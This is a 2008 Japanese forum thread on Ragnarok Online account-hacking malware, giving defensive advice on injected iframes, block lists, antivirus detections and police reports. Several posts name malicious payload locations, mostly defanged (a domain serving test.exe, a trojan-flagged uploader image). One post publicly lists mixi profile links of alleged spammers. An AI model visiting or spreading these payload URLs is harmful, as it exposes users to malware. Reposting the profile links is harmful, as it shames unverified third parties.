VB2008とカスペオンライン の検索結果も 感染無しでした

これは、安全だと思っても大丈夫ですか？

137 ：（○口○*）さん sage ： 2008/03/26(水) 19:26 ID:9s8it81m0

>136
安全・大丈夫と思うのは自由。
本当に安全かどうか・大丈夫かどうかは誰も保障できない。

今回のケースだと、状況から見る限り「多分」平気と「俺」は考える。
でも本当に安全かどうかは何とも言えない。

何故かというと、

A)青箱スレに書かれた時点で罠があり、>132がそれを踏んだ
B)その後、ハク犯が罠の記述を消した
C)>133が見た時点では罠の痕跡が無かった
D)踏んだ罠が新種でカスペでも検出出来ない代物だった

可能性だけでいうならこういう事も有り得る。

この場合「多分平気」と誰かが言ったとしても、実は平気ではなかった、という事になる。

周りは助言は出来ても最終の判断は下せない。
厳しいようだけど、安全かどうか・大丈夫かどうか、の判断を下せるのは当人だけ。

138 ：（○口○*）さん sage ： 2008/03/26(水) 21:18 ID:RXEAPV+Y0

検体提出先修正。セキュWikiの検体提出先は修正済

Quick Heal
<support@quickheal.com> → <viruslab@quickheal.com>

139 ：（○口○*）さん sage ： 2008/03/26(水) 21:55 ID:OHIAVHbi0

あれ、アドレス変わった?
今朝supportに送っちゃった。

140 ：（○口○*）さん sage ： 2008/03/26(水) 22:09 ID:wAhgc5zB0

メールがエラーで戻ってきていないなら、恐らく自動的に転送されている

141 ：（○口○*）さん sage ： 2008/03/26(水) 22:28 ID:RXEAPV+Y0

>>139
問題ないよ。そっちでも受け付けてる。但し、viruslubの方がbetterだって返答も来てる筈だ。

142 ：（○口○*）さん sage ： 2008/03/26(水) 22:36 ID:RXEAPV+Y0

ちょっと気になったので、過去のメール履歴見てみた。
（気付いたのは今日なんだ…いつも読まずに読了にしてた）

QuickHeal担当者さんごめんなさい。ずいぶん前から宛先変えてくれって言ってたんだね。
表現が替わってるところを見ると、テンプレじゃなく書いてくれてたみたい。正直すまんかった。

2007/12/28
We request you to send further virus samples at viruslab@quickheal.com.

2007/12/31
Well, we request you to send the further samples at viruslab@quickheal.com

2008/01/04
Well, we request you to modify your e-mail address list and add viruslab@quickheal.com
ID in place of support@quickheal.com

2008/02/04
We request you to forward these samples directly to viruslab@quickheal.com

2008/03/11
We will be highly obliged if you will keep forwarding such samples to viruslab@quickheal.com

2008/03/21
We request you to send all such samples directly at viruslab@quickheal.com ID.

2008/03/24
We will be highly obliged, if you will start forwarding such mails to viruslab@quickheal.com
This Id is dedicated for receiving samples of malwares. For better assistance,
I request you to forward such samples ONLY to viruslab@quickheal.com.

2008/03/25,26
You are requested to forward the samples at viruslab@quickheal.com for better assistance.

143 ：（○口○*）さん sage ： 2008/03/27(木) 06:54 ID:IkGkCxxT0

IBM SOCでは２００８年３月２４日１９頃から、SQLインジェクションを使った攻撃の再開を確認しました。
ttp://www.isskk.co.jp/SOC_report.html

例の「fuckjp■js」による改ざん攻撃が再開されているようです。

144 ：（○口○*）さん sage ： 2008/03/27(木) 07:12 ID:+EMo9XL70

このスレ的には、カスペルスキーが一番オススメっぽいな・・・。
バスター消そうかな。2008になってなんか使いづらいし・・・。

145 ：（○口○*）さん sage ： 2008/03/27(木) 08:52 ID:UM1zpAaM0

>>142
読まずに削除してた＼(^o^)／
だってQuickHealからの返信メール、
中身としてはほとんど意味ないんだもん。

>>143
LACにも出てたね。
2117966■net、ググるとfuckjp0.jsなんだけど
0付きのは見つからなかったなぁ(0無しの既出のはあった)。

146 ：（○口○*）さん sage ： 2008/03/27(木) 08:57 ID:2LVOxKXk0

総合スレ547

【　　アドレス 　 】http://www5■uploader■jp/user/tane/images/tane_uljp00326■jpg

どう見てもただのブラクラです。ここは鑑定スレじゃねーんだ、2chで鑑定スレ捜してそっちで聞け。

F-Secure 6.70.13260.0 2008.03.26 Trojan.HTML.Agent.b
Kaspersky 7.0.0.125 2008.03.27 Trojan.HTML.Agent.b
Sophos 4.27.0 2008.03.27 Mal/Iframe-F
Webwasher-Gateway 6.6.2 2008.03.26 Webwasher: Win32/ImgTagVulnerability

147 ：（○口○*）さん sage ： 2008/03/27(木) 09:16 ID:UM1zpAaM0

そのアップローダ自体2chセキュ板のだしなぁ

148 ：（○口○*）さん sage ： 2008/03/27(木) 13:44 ID:OIzir/Su0

質問です。
最近はスクリプトで罠が仕掛けられているというのをこのスレで見るのですが、
そのスクリプトはソースチェッカでも危険として出るのでしょうか？
それと、危険なスクリプトの見分け方（どういった文字列が含まれていると危険なのか）
等を教えてはいただけませんでしょうか？
すみませんが、宜しくお願いします。

149 ：（○口○*）さん sage ： 2008/03/27(木) 14:14 ID:2SBCNblQ0

英文読解の能力も、セキュリティリスクと言えるかもしれないな。

150 ：（○口○*）さん sage ： 2008/03/27(木) 16:13 ID:2LVOxKXk0

>>148
主に使われるのが、サイズ０（縦横両方、もしくは片方）のiframeによってアカハックのダウンローダを
読み込ませる方式。この方式で、既知のアドレスを呼び出していたら、最後まで辿らないでもアカハックと
断定しちゃっていいと思う。

JavaScriptでダウンローダを読み込ませるものもあるので、iframeが無ければ安全という訳ではない。

他にも、アニメカーソルを呼び出し、WindowsUpdate当たっていなければ、セキュリティの穴を利用して
本体をダウンロードさせようとするものもある。

>そのスクリプトはソースチェッカでも危険として出るのでしょうか？
ぶっちゃけると出ないこともある。iframeでの呼び出し自体は普通のWebページでもあるし、
カウンターの類を表示させずに実行させる為に挿入されるケースも無いとは言い切れない。

危険なスクリプトかどうかの断定は、結局の所、辿ってみないとわからないところもある。

151 ：（○口○*）さん sage ： 2008/03/27(木) 16:39 ID:7xc14npp0

「注意！○○タグを発見！」と黄色で書かれてても無害な物もあるし
「このアドレスの安全度 100%」と出ていてもソース見ると紛れもない垢ハックだったり

「チェック結果」の情報を参考にしつつソースを自分で精査しないと
確実なところはわからないと思うね

152 ：（○口○*）さん sage ： 2008/03/27(木) 18:39 ID:OIzir/Su0

なるほど、厳しいんですね…頑張って調べてみます。
ありがとうございました。

153 ：（○口○*）さん ： 2008/03/27(木) 22:23 ID:Y1O/NrJp0

捜査にはガンホーの協力が不可欠で、また海外からの不正アクセスには積極的な捜査が難しいこともあり
結局のところほぼ全ての被害者が泣き寝入りになっているようである。
ガンホー側が動かない限り被害者はほぼ引退に追い込まれるのだが、
ガンホーには何の動きも見られなかったようだ。
消費者センター側もたびたび警告を行っている模様だが、受付も「またガンホーですか」という対応を見る限り蛙の面に水。

これアサテンプレからなんだけど
ここ見ると結構帰ってきてる人いるみたいだよね？
実際捜査以来して帰ってこなかった人いる？やられちゃって不安なんだけど・・

154 ：（○口○*）さん sage ： 2008/03/27(木) 23:27 ID:S/5iZJvu0

>>153
それは情報が古いのではないかと。
アカハックが流行しだした頃は、泣き寝入りが多かったそうですよ。
ハイテク犯罪センターがアカハックの知識をつけてくれたりしたおかげで、
警察から要請があれば調査せざるを得ないことや件数の多さなどから
「不正アクセスが立証できれば補償する」
という方向に変わったのでしょう。

現在はアカハック専用の被害届けフォームまで置いているくらいですし、
消費者センターに相談などしなくてもスムーズに処理されるようなルートが出来ています。

155 ：（○口○*）さん sage ： 2008/03/27(木) 23:36 ID:WtSN23jC0

単純に修正しようとすると癌を目の敵にしてる人が妨害するせいだと思うけどね。

156 ：（○口○*）さん sage ： 2008/03/28(金) 00:45 ID:kXUQfrL90

修正ってなにをさ。

157 ：（○口○*）さん sage ： 2008/03/28(金) 00:48 ID:6kO/h2iU0

アサテンプレの文章でしょ

158 ：（○口○*）さん sage ： 2008/03/28(金) 02:27 ID:k2FgS9Qg0

最後の行の消費者センター云々はアカハックと関係無いんじゃないかねぇ
消費者センターからの警告って主にBOT蔓延に対して声が大きかった頃でしょ
アカハックに付いても消費者センター通したって報告あったっけ？

159 ：（○口○*）さん sage ： 2008/03/28(金) 02:31 ID:k2FgS9Qg0

なんか初期の初期にあったような気がしてきた……158はスルーで

160 ：（○口○*）さん sage ： 2008/03/28(金) 03:02 ID:RI3zaktr0

FAQ/用語集/か行→ 癌砲
ttp://assassin.rowiki.jp/index.php?FAQ%2F%CD%D1%B8%EC%BD%B8%2F%A4%AB%B9%D4#k779c63b
--
2006年末のオフラインミーティングでは「アイテム課金の後不正者対策を行う」と発言、その拝金ぶりにユーザーは激怒。
その直後課金アイテムが公式発表された。
その課金アイテムの「濃縮オリデオコン」「濃縮エルニウム」実装に合わせて、
二次職実装以来存在していたBSの武器研究による精錬成功率上昇を消滅させ事実を隠蔽。

これから先の不正者取締りが注目･･･される事はもうないかもしれない。
--
１年以上前で止まっているわけで
つうか癌の悪口書きたいだけじゃないかと
こんなところ見ない、って人も多いんだろうが、ケツぐらいは拭いて欲しいよなあ

161 ：（○口○*）さん sage ： 2008/03/28(金) 14:27 ID:aqDuz3UQ0

>>160
アサシンwikiにとってあまり重要ではない項目なんだろう
俺には癌の項目に特に書き足すことはない
wikiなんだからそのままで自分が困るなら自分で編集すればいい

よく悪意の編集をされてるから閲覧には注意すべきではある

162 ：（○口○*）さん sage ： 2008/03/28(金) 14:43 ID:Q0ROprGv0

mixiでautomouseの宣伝をやってたやつがいたので晒し上げ
http://mixi.jp/show_friend.pl?id=17426855
http://mixi.jp/show_friend.pl?id=17429717
http://mixi.jp/show_friend.pl?id=17447324
http://mixi.jp/show_friend.pl?id=17447177
http://mixi.jp/show_friend.pl?id=17430344

↑のやつらの元アカっぽいやつはこれ
http://mixi.jp/show_friend.pl?id=14890435

mixiが安全じゃないことはもう分かってると思うが、見かけたら気をつけてくれ

163 ：（○口○*）さん sage ： 2008/03/28(金) 15:04 ID:+0u9vQjD0

スレ違いだ馬鹿、さっさと削除依頼出してこい

164 ：（○口○*）さん sage ： 2008/03/28(金) 21:45 ID:qExxYqgF0

お試しカスペ入れてＲＯ起動したら、なんか検知された。
これって、一体何なのでしょう？
放置しててもいいのか、消去したほうがいいのか
さっぱり不明です・・・。

検知しました: リスクウェア Invader

165 ：（○口○*）さん sage ： 2008/03/28(金) 22:05 ID:YQjFa9eL0

>>164
RO（nPro)は不振な振る舞いをするリスクウェアです。

セキュスレ２より
｜10 名前：（○口○*）さん：07/04/25 17:19 ID:ecNW/h2i0
｜今ROを起動したところカスペルスキーが反応して
｜
｜プロセスを実行します
｜\RagnarokOnline\GameGuard\GameMon.des
｜リスクウェア「Invader」の亜種を検知しました
｜
｜と出ました。
｜プロセスをすべて拒否し、念のため回線を抜いて携帯からパス変更しました。
｜Invaderをググってもよくわからないので、これは一体何なのかどなたか教えて
｜もらえないでしょうか（´・ω・`）
｜
｜携帯から書き込もうとしたらエラーが出たので、当該PCより書き込んでいます。

｜11 名前：（○口○*）さん：07/04/25 17:33 ID:2a4usTN10
｜nPro自体がルートキットみたいな属性なんで、悪質なソフトと誤認された可能性が高いです。
｜本当にウィルスなのか、nProがウィルスと誤認されただけなのかの判断ができません。
｜
｜リスクウェアの説明を読んでみて下さい。nProがこれに該当するのは当然だと思いますが…。
｜http://www.viruslistjp.com/riskware/
｜
｜nProのリスクを把握したうえでプレイするわけですから、ROをプレイするなら許可出しちゃっていいと思います。
｜気分が悪ければ、キャラデリ→癌ID削除→HDDフォーマット（nProの残骸抹殺）してクリーンな環境に戻りましょう。

166 ：（○口○*）さん sage ： 2008/03/28(金) 22:15 ID:qExxYqgF0

>>165
御教授、感謝します<(__)>
なるほど・・・nProですか。
とりあえず、許可してみます。

167 ：（○口○*）さん sage ： 2008/03/29(土) 07:28 ID:XEw5hhyV0

>>162
中華の宣伝するなよ･･･

168 ：（○口○*）さん age ： 2008/03/29(土) 14:44 ID:B72OdICH0

ハクスレにあったけど、念のためにこちらにも転載
重要なのでageとく

---------------------------------------------------
577 名前：(^ー^*)ノ〜さん MAIL:sage 投稿日：08/03/29 13:30 ID:wUl6oFc40
>2にある
>・リネージュ資料室 (応用可能な情報が多数)
>　http://lineage.nyx.bne.jp/
が、3/29付で移転しております。
ttp://lineage.paix.jp/
に、自動で転送されますが、PeerGuardian2用リストは登録し直しが必要になるそうです。


578 名前：(^ー^*)ノ〜さん MAIL:sage 投稿日：08/03/29 14:42 ID:70aOROei0
>577
当然ながら、hostsリストもアドが変更になってる。

特にhostsRenew使ってて、更に自動更新かけてる人は必ず設定の変更を。
BSWikiさんのリストを組み込んでたり、hostsAppend=0にしてたらまだ平気だけど
デフォ設定のままだと、ごっそりと情報が欠落することになる。
---------------------------------------------------

169 ：セキュスレ1-936 sage ： 2008/03/29(土) 17:08 ID:GlTW51hG0

hostsRenewScriptの人です。

リネージュ資料室さんのアド変更に伴い、Ver0.09aに更新しました。
ttp://acopri.rowiki.jp/index.php?hostsRenewScript

変更点はstrURL(0)の設定値（URL）のみです。


>168で指摘されてるように、デフォルト設定のままですと纏め臨時サイトさんの
リストしか読み込みません。

以前のリネ資料室のアドレス変更時は旧アドでもDL出来たのですが
今回は旧アドだとDL出来ないため、必ずcfgの変更をお願いします。

170 ：（○口○*）さん sage ： 2008/03/29(土) 18:49 ID:emyHRGrS0

お試しカスペ入れてＲＯ起動したらキーロガー検知って出たんだけど
これも164と同じなんでしょうか？

171 ：（○口○*）さん sage ： 2008/03/29(土) 19:11 ID:LsulVmCh0

プロアクティブディフェンスを有効にしていると、何種類か引っかかるよ
ROの起動時だけではなくログイン中にも検出される

172 ：（○口○*）さん sage ： 2008/03/29(土) 20:46 ID:ZtzS+nz90

>>170
Ragexe.exeが検出されることもあれば、隠蔽されてて対象名がでないこともあるけど、nProの場合が多い。
他タスクを検知してる可能性もあるから断定はしないけど、うちでも出てるよ。

173 ：（○口○*）さん sage ： 2008/03/30(日) 01:01 ID:kYAbi+tE0

というかその質問も多すぎるからテンプレ入りかもしらんね

174 ：（○口○*）さん sage ： 2008/03/30(日) 11:58 ID:ka6ogmEx0

【　 　 　 気付いた日時　 　 　 　 　 】2008/03/30
【不審なアドレスのクリックの有無　】「きもろだ」でクリック
【　　アドレス 　 】http://f40■aaa■livedoor■jp/~kimoita/up/img/1027■html
【　 　　 OS　 　 】WindowsXP Home SP2
【使用ブラウザ 】IE6.0.2 sp2
【WindowsUpdateの有無】 ２週間前
【　アンチウイルスソフト 】ウィルスバスター
【その他のSecurty対策 】 無
【 ウイルススキャン結果】 カスペルスキーオンラインスキャンで検出無し
【テンプレの参考サイトを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】HACKの文字があり不安になった為書き込みに至る

クリックしてしまったのですが、大丈夫でしょうか？
よろしくお願いします

175 ：（○口○*）さん sage ： 2008/03/30(日) 12:00 ID:Qkyg3OWG0

>>174
3.スレで質問する
　1.2の方法でも判断出来ない場合、スレで聞いてみるのも手です。
　ただし、このスレは『勇気が無くて見れないサイト解説スレ』ではありません。
　その点だけは注意してください。

176 ：（○口○*）さん sage ： 2008/03/30(日) 12:49 ID:opa3rLNZ0

確かに、下記の文字列は入ってるけど…危険そうなコード見あたらないしなぁ。
send_aaa.js 辺りは見てもわからんし、とりあえずパス１。

script language="Web Hack,Hack Team,Pc Hack,Msn Hack,Xss,security,proxy,exploits,Hacker,crack,firewall,scan,Serial,Shell,Fake,Defaced,emchack,nettoxic,programlar"

177 ：（○口○*）さん sage ： 2008/03/30(日) 12:50 ID:SnxDpmw10

>>169
資料室は以前に、クラック依頼が出されていたような話も出ていたし、DDNSのサービス運営会社も挙動が怪しい。
ドメインが失効した場合に、スクワットされる可能性も捨て切れないので、移転前のURLは最終的にブロック対象に含めるのが
良いのかもしれない。念の為に。

ネットサービスで何が怖いって、音信不通なんだよね。

178 ：（○口○*）さん sage ： 2008/03/30(日) 15:57 ID:LPfPxGG00

>>177

流石に特定アにjpは敷居高いと思うぞ。

179 ：（○口○*）さん sage ： 2008/03/30(日) 17:11 ID:Cfmrq6490

>>178
特亜だからこそ何してくるか分からないわけだが…。

180 ：（○口○*）さん sage ： 2008/03/30(日) 22:14 ID:oFHNceIg0

万が一DDNSのサービスを攻撃されると非常にやばい。
そこまでしなかったとしても、国内にいる仲介者が取得したら同じ事。

動向次第なのは確かだけど、最終的に旧アドレスは危険扱いにした方が無難、とかになるかもね。

181 ：（○口○*）さん sage ： 2008/03/31(月) 07:18 ID:HGdbYXNl0

jpでいいならドメインとらなくても
geocitiesとかiswebとかaaacafeとかに置けばいいんじゃね?

182 ：（○口○*）さん sage ： 2008/03/31(月) 09:27 ID:ACfyy39g0

>181
上の流れは資料室さんの旧アド(bne.jp)の話じゃね？


ところでふと思ったんだが、職Wikiの一部はrowiki.jpでやってる。
でも実体はxreaとかのレン鯖とかにある。

これと同じように中華が自前でCNなドメインを取り、中継者がjpドメインを取って
jpドメインでアクセスできるように設定されると、厄介なことにならんかね？

183 ：（○口○*）さん sage ： 2008/03/31(月) 10:39 ID:m49Kggpc0

>>182
理論の上では可能だが、多分割りに合わないからやっていないのだと思われ。
.cn(や.com)は取得費用が安いが、.jpは明らかに高いし。
それと、.jpで取得してきたら、不正アクセスで中継者の立件も視野に入るし。

むしろ危惧すべきは、xrea.comのtypo狙いドメイン。
こちらのほうが、取得が容易な分、想定被害の面では危ないと思われ。
具体的な例は挙げないが、実在するドメインと、現段階で取得可能な物がある。

その意味では、現在行われているrowiki.jpへのCNAME集約も、一定の効果があるかと。
.jpドメインなら、typoしても大したことはない。

184 ：（○口○*）さん sage ： 2008/03/31(月) 16:55 ID:ACfyy39g0

>183
コストとリスクの問題かぁ。
でも逆に言えば、割に合う判断してきたらjp系ドメインで活動する可能性もあるわけで。

typo含めてアドレスは要注意・鵜呑みにしてはいけないってのは変わらないけど
jpドメインだと警戒心薄れる場合もあるから気をつけないとね。

185 ：（○口○*）さん sage ： 2008/04/01(火) 04:26 ID:/SGVEA94O

昨日の朝日の夕刊の社会面に、中国からのSQLインジェクションによるサイト改竄被害について書かれてるんだが
これって、もはやネット上の全てのサイトの安全性が保証できないってことか

186 ：（○口○*）さん sage ： 2008/04/01(火) 08:14 ID:ua+7x1mt0

中華RMT業者がiframeやscriptでネトゲトロイを突っ込むのは
前からある話だよ。3年前には価格コムが改竄され、
先月はトレンドマイクロが改竄された。
いずれもSQLインジェクションで、きちんとアプリを作らなかったメーカがボンクラ。

187 ：（○口○*）さん sage ： 2008/04/01(火) 08:22 ID:Q6ZaH/HI0

FC2の最近のtemplate改竄も、SQLインジェクトされた疑いが出てきているな。

229 名前：Trackback(774)[sage] 投稿日：2008/03/26(水) 05:12:16 ID:g0QkeMYd
http://blog.fc2.com/forum/viewtopic.php?p=82913#82913
一連の改竄騒ぎは新管理画面がヤバイというプログラマの意見

>テンプレートは旧管理画面はファイルに新管理画面はDBに登録されている、という記述がどこかにあったこと、
>// DB に登録したほうがメインとなるサーバの負荷は下がるが、SQLインジェクションをくらいやすくなる
>セッション管理がうまくいっていない(アドホックな対応が行われている)という印象を受けること

188 ：（○口○*）さん sage ： 2008/04/01(火) 11:16 ID:0/BjvKsL0

無償アンチウイルス“avast! Home”にスパイウェア・ルートキット対策が追加
最新版v4.8が公開、Windows Vista SP1およびWindows XP SP3での動作を確認済み
http://www.forest.impress.co.jp/article/2008/03/31/avast48.html

189 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/04/02(水) 00:55 ID:Bv4OR86L0

お久しぶりです。まとめ臨時の中の人です。
http://sky.geocities.jp/ro_hp_add

過去にあった救済報告と被害例、疑問など最近の過去スレから有用かな？
と判断したものを拾い上げて事例ごとにUPしました。

190 ：（○口○*）さん ： 2008/04/02(水) 18:43 ID:zmoouw0aO

中の人乙です

ついでにageとく

191 ：（○口○*）さん sage ： 2008/04/02(水) 21:34 ID:GAyBqK/R0

Webサイトの検索機能を悪用、「IFRAME SEOポイズニング」攻撃が流行
ttp://pc.nikkeibp.co.jp/article/NEWS/20080331/297570/

Webサイトの改ざんをしないで、危険サイトに誘導する方法が流行っているらしい

192 ：（○口○*）さん sage ： 2008/04/03(木) 08:53 ID:MmgvTKFhO

最近FFから復帰したんだがROでもFC2は踏まないでいたほうがいいのか
桑原桑原

193 ：（○口○*）さん sage ： 2008/04/03(木) 12:23 ID:Z7LxLsGf0

つうかFFI(大航海もかな)に活動拠点を移した感じがする
ROは半年前に通った道

194 ：（○口○*）さん sage ： 2008/04/03(木) 18:10 ID:nkGyUxWN0

Apple、11件のセキュリティ問題を修正した「QuickTime」v7.4.5を公開
ttp://www.forest.impress.co.jp/article/2008/04/03/quicktime745.html

195 ：（○口○*）さん sage ： 2008/04/04(金) 08:47 ID:AU1n0hjA0

ここ数日PG2が58■227■193■190をブロックしているのですが垢ハックウイルスに感染しているのでしょうか？
とても心配です(´・ω・｀)

196 ：（○口○*）さん sage ： 2008/04/04(金) 09:28 ID:lkQR3HfX0

>195
そのIPは韓国のものっぽいけど、心配する前にウィルスのチェックやら
WindowsUpdateの確認やら、いろいろと済ませたのかい？

197 ：（○口○*）さん sage ： 2008/04/04(金) 10:34 ID:Mz0AlZLx0

http://spywaredetector.net/spyware_encyclopedia/Spyware.Blue%20Mountain.htm
スパイウェアだな

198 ：（○口○*）さん sage ： 2008/04/04(金) 11:51 ID:arMDG0GJ0

やることやってから尋ねろって事だな

199 ：195 sage ： 2008/04/04(金) 19:03 ID:AU1n0hjA0

返信送れてすいませんm(_ _)m
WUはIE７へうｐ以外はすべて完了してます（XP SP2）
カスペの検査も問題なかったです

どうもttp://sankei■jp■msn■com/（産経新聞のHP）にアクセスすると該当IPへのアクセスがでてブロックされるようなので特に問題ないのかなと考えてます
お手数おかけしました

200 ：（○口○*）さん sage ： 2008/04/04(金) 22:54 ID:arMDG0GJ0

向こうの誘導キチガイ何とかしてくれ

201 ：（○口○*）さん sage ： 2008/04/04(金) 22:58 ID:1zjRtrdV0

向こうの591は俺だが590はネタ振りにしか見えなかった
俺はトスされたボールを打ち返したにすぎない

202 ：（○口○*）さん sage ： 2008/04/04(金) 23:02 ID:nonxIktZ0

そういう奴は嫌いじゃない

203 ：（○口○*）さん sage ： 2008/04/04(金) 23:21 ID:arMDG0GJ0

それってネタとして使ってるって事じゃないのか、わかってるなら触るなよ

204 ：（○口○*）さん sage ： 2008/04/04(金) 23:23 ID:1zjRtrdV0

あれ以外にどう返せと言うのだね
目の前で竜ちゃんが「押すなよ！　絶対押すなよ！」って言ってる気分だったぞ

しかも590どう見ても必要なレスじゃねーし

205 ：（○口○*）さん sage ： 2008/04/04(金) 23:25 ID:arMDG0GJ0

おまえさんにゃ何言っても無駄のようだ

206 ：（○口○*）さん sage ： 2008/04/04(金) 23:26 ID:1zjRtrdV0

ちなみに俺が誘導貼ったのは今回が初めてだ
それだけ絶妙なネタ振りだった

207 ：（○口○*）さん sage ： 2008/04/04(金) 23:33 ID:AuMPRr3g0

だから、そういうネタは、あっちではやるなよ。

208 ：（○口○*）さん sage ： 2008/04/04(金) 23:35 ID:1zjRtrdV0

そもそも590がなければ591も必要なく、その590が必要なレスではないという
ネタ抜きにしても他の対応手段はないと思うんだが

209 ：（○口○*）さん sage ： 2008/04/04(金) 23:39 ID:nonxIktZ0

放置またはマジレス

210 ：（○口○*）さん sage ： 2008/04/05(土) 00:11 ID:UQgjfhVe0

そろそろ、向こうが今でも必要なのかどうか、見直す時期なんじゃないかな。
1スレ自体は４年前に建てられたものだし、当時と今では、ハックの内容も、周囲の取り巻く状況も大きく変化している。
それと、RO板というか、MMOBBSにログ保存の仕事を押しつけ杉ではと思う側面もある。
RO板にある事によって、他のオンラインゲームのプレイヤーに注目されにくい部分もあるし。

また、危険アドレスを掲載する事によって、注意喚起にはなるが、一方で該当アドレスが警戒対象になった事が業者の連中に
判ってしまうので、ばら撒くアドレスを新しいものに移行することを加速させてしまう可能性もある。まるで耐性菌の問題のようだが。

そろそろ、掲示板システムに頼らない、外部での情報収集、蓄積のシステムへの移行が必要な時期なのかもしれない。
リネ資料室も、無料DDNSに限界を感じ、独自.jpドメインへの出費も止むなしとなった訳だし。

211 ：（○口○*）さん sage ： 2008/04/05(土) 01:14 ID:7AjPsspt0

>>210に激しく期待。

212 ：（○口○*）さん sage ： 2008/04/05(土) 18:01 ID:Co0fWt8R0

本スレの補填された人、ｚも補填されたのか〜。
自分も被害にあって補填された人なんだけど、ｚの補填はできませんって
キッパリ最初の文章で断り入れられてたよ。
どうせ2-3Mくらいしかなかったけどさ。

213 ：（○口○*）さん sage ： 2008/04/05(土) 18:45 ID:uZiho9Re0

>>43-44です。
一昨日、警察署に出向いてきました。
担当官の作った供述調書に目を通し、おかしいところを直してサインと拇印を押してきました。
調書の内容は、「私は○月○日、このような事件にあいました」という
私目線の口調で書かれたもので、A4の紙に大きめの字で４ページくらいでした。

相方の担当官とも連絡を取ったそうですが、あちらも頭を抱えていたとか。
以前、IPから住所を割り出してあるアパートにたどり着き、
大家さんに頼んで鍵をあけたところ、人は誰もおらずサーバが部屋のど真ん中で動いていただけだったとか。
（プロキシサーバだったみたいです。海外からのアクセス用）
海外からとわかった時点でガンホーから捜査打ち切りと言われないか心配…といってました。

なんにせよ、これでやっと相手を調べにかかることができるそうです。
時間がかかっていますが、手口が常習犯くさすぎるので
担当官も慎重になられているようです。

214 ：（○口○*）さん sage ： 2008/04/06(日) 14:14 ID:2bDG1N920

2117966と似たような(あれよりは小規模な)script注入。
ttp://blog.trendmicro.com/massive-iframe-attacks-continue/
あっちで扱うべきか微妙な(国内での注入が確認されていない)ので
とりあえずこっちに。
www■nmidahena■com
→www■nmidahena■com/test.exe

215 ：（○口○*）さん sage ： 2008/04/06(日) 18:46 ID:1RCQWtZN0

>>214

削除依頼してこいｗ
ドットは■に変換!これお約束だぞ

214の内容のこぴぺ（修正済み）

2117966と似たような(あれよりは小規模な)script注入。
ttp://blog■trendmicro■com/massive-iframe-attacks-continue/
あっちで扱うべきか微妙な(国内での注入が確認されていない)ので
とりあえずこっちに。
www■nmidahena■com
→www■nmidahena■com/test.exe

216 ：（○口○*）さん sage ： 2008/04/06(日) 18:51 ID:1RCQWtZN0

あ・・・俺が吊ってくるわ

217 ：（○口○*）さん sage ： 2008/04/06(日) 19:06 ID:2bDG1N920

どんまい

218 ：（○口○*）さん sage ： 2008/04/06(日) 19:43 ID:AU+sSuGn0

TrendMicroも改竄されたことがあるから、あながち間違った対応、とは言い切れないご時勢だけどね。
困ったものだ。

219 ：（○口○*）さん sage ： 2008/04/06(日) 22:58 ID:KyxjiIez0

最近ブラウザを、昔から使ってたIEコンポーネント系タブブラウザ
(※数年前に開発終了してる)からsleipnirに切り替えたんだが
アドレスバーに単語入れるとGoogle の I'm Feeling Lucky で
検索してページ出してくれるのな……

動作が気に入らないからカスタマイズして設定変えたけど
最近のブラウザはこういう動きが多いんだろうか？
これって非常に危険な仕様に思えるんだが……

220 ：（○口○*）さん sage ： 2008/04/06(日) 23:10 ID:Bi9wt8JQ0

Donaにはじまり、その後は長いことMoon使ってたが、Sleipnirは
何度も挑戦して馴染めず、結局わりと最近Firefoxに移行してほぼ
落ち着いたかな……

221 ：（○口○*）さん sage ： 2008/04/06(日) 23:42 ID:bedv7u110

アドレスバーに単語を入れると検索するって仕様は、いまでは大抵そうだな

222 ：（○口○*）さん sage ： 2008/04/07(月) 05:24 ID:6cbclfTD0

>>221
単語入れると検索、だけじゃなく
検索した結果のページのどれかを勝手に表示する（I'm Feeling Lucky)
のが危険、って話じゃないの？

223 ：（○口○*）さん sage ： 2008/04/07(月) 11:46 ID:AIF3SVu20

>>222
>>219の内容はそういうことだよな。
火狐もI'm Feeling Lucky使ってるから気をつけたほうがいいかもしれん。
だが検索結果1位のページ表示だから検索対象が変なサイトじゃない限りは“おそらく”大丈夫だろう。

224 ：（○口○*）さん sage ： 2008/04/07(月) 13:42 ID:litc0lZe0

警察に調査依頼して3週間音沙汰無しなんだけどなんていって催促したらいいかな・・

225 ：（○口○*）さん sage ： 2008/04/07(月) 13:44 ID:rmMgnaFV0

何に対してもだけどこちらから積極的に動かないと進展無いぞ？
遠慮する必要なんて無いし

226 ：（○口○*）さん sage ： 2008/04/07(月) 13:52 ID:q2XcKYCZ0

「あの〜アカウントハックの件で○○さんを…」
「異動になりました」

227 ：（○口○*）さん sage ： 2008/04/07(月) 15:34 ID:dSDzUl2e0

>223
意図しないページが表示されるという点で気持ち悪い仕様だけど、元々これはGoogleの機能だし
結局の所、Googleを信用するしかないのかもねぇ。

対策としては Sleipnir に標準でついてる検索バーから検索する。
(検索バーは結果が出るので即飛ぶことは無い)

又アドレスバーに単語入れて検索する癖がある場合は　
ツール→オプション→ツールバー→アドレスバー
から検索リクエストをカスタム設定にして設定変更して、I'm Feeling Lucky を
使わないようにする。

それか上の設定から「検索を無効にする」でもいい。


ちなみに自分はアドレスバーの検索が癖になってるので、カスタム設定で以下のような形にして
普通の検索結果が100件出るようにしてる。
http://www.google.co.jp/search?num=100&hl=ja&q=@enc:

228 ：（○口○*）さん sage ： 2008/04/07(月) 17:26 ID:Zet1eURK0

プニル使いだがアドレスバーも検索バーも表示しない設定にしてるよ。
アドレスはコピーしてCTRL+SHIFT+Vで新規に開けるし、
検索はお気に入りからグーグル開いて入力してる。

229 ：（○口○*）さん sage ： 2008/04/07(月) 17:57 ID:xDMP1tNV0

鯖板にあったもの。アカハックではなく、多分spamなのでこっちに。

|674 Saraの中の名無しさん New! 08/04/07 17:04:46 ID:EgX5XSqq
|今後こちらの掲示板を使用します。
|引き続きトリップなどの練習は練習用で！
|ttp://www■info-kirara■net/cgi-bin/bnbbs/bnrbbs■cgi

230 ：（○口○*）さん sage ： 2008/04/07(月) 20:55 ID:W8D0cCWW0

>>224
最寄署にしか相談していませんか？
最寄署に再度連絡し、反応が鈍いようだったら警視庁のハイテク犯罪センターにも連絡してはどうでしょう。
捜査が全く進まない旨を伝えて、事情を話せば本庁からせっついてくれたりもします。

231 ：（○口○*）さん sage ： 2008/04/07(月) 23:33 ID:litc0lZe0

>>225
そうはいっても自分の不注意で仕事増やしちゃってなんか申し訳なくてさ・・

>>256
そしたらあとは頼む

>>240
！！！
ありがとうございます(´；ω；`)
